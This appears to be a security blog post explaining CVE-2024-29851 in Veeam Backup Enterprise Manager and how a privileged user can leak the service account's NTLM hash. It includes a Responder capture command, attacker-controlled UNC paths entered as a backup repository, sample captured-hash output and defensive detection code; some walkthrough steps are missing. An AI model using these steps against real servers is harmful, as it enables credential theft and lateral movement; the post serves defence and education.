*Published: June 2024*
Veeam Backup & Replication is a super popular backup solution for virtual environments and critical infrastructure. If you use Veeam, you probably know about Veeam Backup Enterprise Manager (VBEM) — a web interface that centralizes management for multiple Veeam servers.
But in April 2024, a security advisory came out: CVE-2024-29851. This vulnerability can let a high-privilege user steal the NTLM hash of the Enterprise Manager’s service account. In this post, I’ll break down what’s going on, show you how it works (with code!), and explain what you need to do to stay safe.
What Is the Vulnerability? (CVE-2024-29851)
Summary:
By making the Veeam Backup Enterprise Manager service connect to a resource the attacker controls (like a network share), an attacker on the web interface (with high privileges) can cause the service to leak its account's NTLM hash. With this hash, attackers can try pass-the-hash attacks or brute-force to recover the plaintext password.
Why care?
The Enterprise Manager service often runs with lots of trust on your network. If an attacker gets their hands on this NTLM hash, they could escalate privileges or move laterally.
Stealing an NTLM Hash: The SMB Trap
NTLM hashes get “leaked” when Windows systems try to authenticate to remote network shares (for example, over SMB/CIFS). If the attacker can trick the service into accessing something like \\evilbox\share, Windows helpfully sends the service account’s NTLM hash as part of the “authentication” process.
So, we need a way to make Veeam Backup Enterprise Manager reach out to an attacker-controlled UNC path.
Vulnerable Feature: Add a Backup Repository
In Veeam Enterprise Manager, a privileged user can add or configure backup repositories. The attacker can supply a UNC path for a backup location — for example, \\attacker-ip\share. When Enterprise Manager tries to “validate” or “connect” to this path, it will authenticate… and leak its NTLM hash.
Exploitation in Practice
Let’s walk through this with real steps. This is for demonstration and defense purposes only.
1. Set Up an SMB Listener
You can use Responder (https://github.com/lgandx/Responder) on a Linux box:
sudo responder -I eth
(This tool will answer SMB requests and log incoming hashes.)
2. Add a Malicious Backup Repository
1. Open Veeam Enterprise Manager from a privileged account (something like “Portal Administrator”).
4. Save/apply. The manager will try to validate the path.
3. NTLM Hash Collected!
Responder will show output with the NTLM hash of the service account running the Veeam Backup Enterprise Manager server:
[SMB] NTLMv2-SSP Client : 192.168.56.123
[SMB] NTLMv2-SSP User : DOMAIN\ServiceAccount
[SMB] NTLMv2-SSP Hash : ServiceAccount::DOMAIN:...HASH DATA...
What Can Attackers Do With This Hash?
- Pass-the-Hash: Use the hash to authenticate as the service account on other systems, without knowing its password.
Risk and Impact
- You need to be a high-privilege user on the Enterprise Manager web interface (not a guest) but remember: if you have untrusted admins, or if one admin’s account is compromised, this is very dangerous.
- No “external attacker” exploit — this is not RCE or privilege escalation from no access. But it’s an easy way for a privileged but malicious insider to go from user to system pwner.
Patch and Mitigation
Veeam addressed this in version 12.1.2.172 and later.
UPDATE ASAP!
Veeam KB4594 - Cumulative Patch 12.1.2.172
- Restrict who can add/configure repositories to only trusted accounts.
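Two defender-side checks that follow from the above, as an added example (not code from the post or from Veeam): validating a submitted repository path against an allow-list of known repository hosts, and scanning network-connection logs for outbound SMB (TCP 445) from the Enterprise Manager server to hosts that are not on that list. The host names, subnet, server address, process name and the log lines are all constructed for the example.

```python
import re
from ipaddress import ip_address, ip_network

# Assumed allow-list: hosts the Enterprise Manager server legitimately reaches
# over SMB (known backup repositories) and the subnet they live on.
ALLOWED_SMB_HOSTS = {"repo01.corp.example"}
ALLOWED_SMB_NETS = [ip_network("10.0.5.0/24")]
VBEM_HOST = "10.0.1.20"  # assumed address of the Enterprise Manager server

# \\host\share  ->  host   (matches the leading "\\host" part of a UNC path)
UNC_RE = re.compile(r"^\\\\([^\\]+)(?:\\|$)")

def unc_host(path):
    """Return the host component of a UNC path, or None for non-UNC paths."""
    m = UNC_RE.match(path)
    return m.group(1).lower() if m else None

def host_allowed(host):
    """True only if host is an allow-listed name or lies in an allow-listed subnet."""
    if host is None:
        return False
    if host in ALLOWED_SMB_HOSTS:
        return True
    try:
        return any(ip_address(host) in net for net in ALLOWED_SMB_NETS)
    except ValueError:  # not an IP literal, and not an allow-listed name
        return False

def repository_path_allowed(path):
    """Policy check for a repository path submitted through the web UI."""
    return host_allowed(unc_host(path))

# Constructed lines in a simplified network-connection log (e.g. a Sysmon
# Event ID 3 export): timestamp src_ip dst_ip dst_port image
SAMPLE_LOG = """\
2024-06-01T10:00:01 10.0.1.20 10.0.5.11 445 C:\\Veeam\\EnterpriseManager.exe
2024-06-01T10:02:17 10.0.1.20 203.0.113.7 445 C:\\Veeam\\EnterpriseManager.exe
2024-06-01T10:03:40 10.0.1.20 10.0.5.11 443 C:\\Windows\\System32\\svchost.exe
2024-06-01T10:05:02 10.0.1.20 192.0.2.44 445 C:\\Windows\\System32\\svchost.exe
"""

def suspicious_smb_connections(log_text, src=VBEM_HOST):
    """Outbound SMB from the VBEM server to any host outside the allow-list."""
    hits = []
    for line in log_text.splitlines():
        ts, s, d, port, image = line.split(" ", 4)
        if s == src and port == "445" and not host_allowed(d):
            hits.append((ts, d, image))
    return hits
```

Each hit is a candidate "coerced authentication" event worth correlating with the repository audit trail, since a legitimate repository host should already be on the allow-list before the server ever talks SMB to it.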
References
- Veeam Security Advisory VEEAM-SA-2024-018
- CVE-2024-29851 NVD Details
- Responder SMB Hash Capture Tool
- Explanation of NTLM Relay Attacks
Conclusion
CVE-2024-29851 reminds us that “insider” or “administrator” attacks can be just as dangerous as external exploits. If you manage Veeam Enterprise Manager, double-check your user permissions, patch right away, and block unnecessary SMB traffic. Don’t make it easy for someone to collect the keys to your kingdom — the NTLM hash *is* a key!
Need a simpler summary?
If your Veeam is out of date and you let “trusted” users add repositories, they could trick it into giving away its password hash. Update now, keep an eye on privileged users, and treat your backup software as the prime target that it is.
*Written by an infosec pro for educational and defensive use. Stay secure!*
Timeline
Published on: 05/22/2024 23:15:09 UTC
Last modified on: 08/02/2024 01:17:58 UTC